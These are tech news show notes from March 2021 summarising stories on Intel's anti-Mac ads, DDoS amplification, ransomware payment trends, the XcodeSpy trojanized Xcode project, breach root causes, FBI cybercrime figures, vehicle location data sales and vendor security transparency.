Read. Learn. Share

Tech Talk Show Notes

March 27, 2021

Intel hires Justin Long to mock Macs in a throwback to 2000s “I’m a Mac” ads

Chipmaker Intel has produced a series of ads mocking Apple’s M1 Macs, and it brought on actor Justin Long—famous for his role in Apple’s 2000s “I’m a Mac” ads opposite comedian John Hodgman—to satirize Apple’s own ad campaign.

In five video ads labeled “Justin Gets Real” that have been published to Intel’s YouTube channel, Long begins by saying, “Hello, I’m a… Justin, just a real person doing a real comparison between Mac and PC,” referencing the “Hello, I’m a Mac” and “I’m a PC” start to Apple’s numerous ads.

Long briefly examines a Windows laptop with an Intel processor, then an Apple Silicon-equipped Mac. Eventually, he comes to conclusions about how the Macs are too limited compared to what the Intel PCs can do.

It’s no coincidence that the two Macs that are compared unfavorably in the ads are Apple’s M1-based MacBook Pro and MacBook Air computers. Intel has been beleaguered of late, with both Apple’s M1 and AMD’s Ryzen processors consistently beating Intel in performance. The ads appear intended to point to other, mostly non-performance-related reasons why Intel-based laptops might provide a better experience than Apple’s recent M1 Macs.


~4,300 publicly reachable servers are posing a new DDoS hazard to the Internet

Criminals are upping the potency of distributed denial-of-service attacks with a technique that abuses a widely used Internet protocol that drastically increases the amount of junk traffic directed at targeted servers.

DDoSes are attacks that flood a website or server with more data than it can handle. The result is a denial of service to people trying to connect to the service. As DDoS-mitigation services develop protections that allow targets to withstand ever-larger torrents of traffic, the criminals respond with new ways to make the most of their limited bandwidth.

In so-called amplification attacks, DDoSers send requests of relatively small data sizes to certain types of intermediary servers. The intermediaries then send the target responses that are tens, hundreds, or thousands of times bigger. The redirection works because the requests replace the IP address of the attacker with the address of the server being targeted.


Ransom Payments Have Nearly Tripled

Ransomware gangs aimed to bilk business victims of even more money in 2020, causing the average ransom paid by companies to jump 171% to more than $312,000.

A new report from Palo Alto Networks — which uses data from ransomware investigations, data-leak sites, and the Dark Web — found 337 victims in 56 industries, with manufacturing, healthcare, and construction companies suffering 39% of ransomware attacks in 2020. In addition, ransom demands skyrocketed during the year, doubling both the highest ransom demand — to $30 million—and the highest-known paid ransom – $10 million. The average victim paid more than $312,000, almost a third of the average demand.

The ransoms will likely continue to rise this year because the ransomware groups are innovating to stay ahead of defenders, says Jen Miller-Osborn, deputy director of threat intelligence at Palo Alto Networks’ Unit 42 threat research group.


Attackers are trying awfully hard to backdoor iOS developers’ Macs

Researchers said they’ve found a trojanized code library in the wild that attempts to install advanced surveillance malware on the Macs of iOS software developers.

It came in the form of a malicious project the attacker wrote for Xcode, a developer tool that Apple makes freely available to developers writing apps for iOS or another Apple OS.

The project was a copy of TabBarInteraction, a legitimate open-source project that makes it easier for developers to animate iOS tab bars based on user interaction. An Xcode project is a repository for all the files, resources, and information needed to build an app.

Alongside the legitimate code was an obfuscated script, known as a “Run Script.” The script, which got executed whenever the developer build was launched, contacted an attacker-controlled server to download and install a custom version of EggShell, an open-source back door that spies on users through their mic, camera, and keyboard.

Researchers with SentinelOne, the security firm that discovered the trojanized project, have named it XcodeSpy. They say they’ve uncovered two variants of the customized EggShell dropped by the malicious project. Both were uploaded to VirusTotal using the web interface from Japan, the first one on August 5 and the second one on October 13.


What CISOs Can Learn From Big Breaches: Focus on the Root Causes

There have been dozens of mega-breaches in the past decade and over 9,000 reported breaches. Unsurprisingly, many breaches are unreported, as shown by credential dumps available on the Dark Web of which a breached organization may be completely unaware. What’s going wrong? Why haven’t we been able to stop these breaches? 

In past years, we’ve seen a plethora of security compliance standards rise — PCI, ISO 2700x, NIST 800-53, HIPAA, and others — which require hundreds of checkboxes to be addressed. However, most breached organizations have been compliant at the time the breach occurred. While compliance brings many advantages for helping organizations get more secure, it isn’t sufficient to prevent most breaches.

The primary reason these incidents take place so often is that, as an industry, we haven’t been focusing on the root causes of breaches. 


FBI: Business Email Compromise Cost $1.8B in 2020

The FBI’s Internet Crime Complaint Center (IC3) reports the American public submitted 791,790 complaints in 2020, marking a 69% increase from 2019. Total losses from cybercrime exceeded $4.1 billion.

Business email compromise (BEC) scams were the most expensive, with 19,369 complaints and adjusted losses of approximately $1.8 billion. Phishing scams were also rampant, with 241,342 complaints – a big jump from 114,702 in 2019 – and adjusted losses of more than $54 million. Ransomware complaints continued to increase, with 2,474 incidents reported last year. 

Officials report BEC scams have evolved since 2013 when these attacks typically spoofed email accounts of chief executive officers or chief financial officers and requested wire payments. The scams have since evolved to compromise personal emails and vendor emails. In 2020, the IC3 saw more BEC complaints detail identity theft and funds being converted into cryptocurrency. 


One company wants to sell the feds location data from every car on Earth

There is a strange sort of symmetry in the world of personal data this week: one new report has identified a company that wants to sell the US government granular car location data from basically every vehicle in the world, while a group of privacy advocates is suing another company for providing customer data to the feds.

A surveillance contractor called Ulysses can “remotely geolocate vehicles in nearly every country except for North Korea and Cuba on a near real-time basis,” Vice Motherboard reports

Ulysses obtains vehicle telematics data from embedded sensors and communications sensors that can transmit information such as seatbelt status, engine temperature, and current vehicle location back to automakers or other parties.

“Among the thousands of other data points, vehicle location data is transmitted on a constant and near real-time basis while the vehicle is operating,” the company wrote in a sales pitch document obtained by Vice. As roughly 100 million new cars are manufactured worldwide each year that are “increasingly connected to the manufacturer, other vehicles, infrastructure, and their owners, it becomes apparent that telematics will revolutionize intelligence,” the document adds. 


Tech Vendors’ Lack of Security Transparency Worries Firms

An increasing number of companies have identified security assurance as a major consideration in their decisions to purchase hardware, software, and services — yet many vendors fall short, according to a report published this week by the Ponemon Institute.

Nearly two-thirds (64%) of those polled in the survey consider it very important for their technology providers to be transparent about vulnerabilities, security updates, and ways to patch security issues. But most vendors fail to offer that transparency, according to 47% of those respondents who said they’re not satisfied with the security information provided by vendors. Nearly three-quarters of those surveyed are more likely to purchase technologies and services from companies that prioritize the finding and patching of vulnerabilities and the communications of those security issues, the Intel-sponsored report states.

The survey seems to indicate companies are worried not only about their own security but that of their suppliers as well, says Larry Ponemon, chairman and founder of the Ponemon Institute.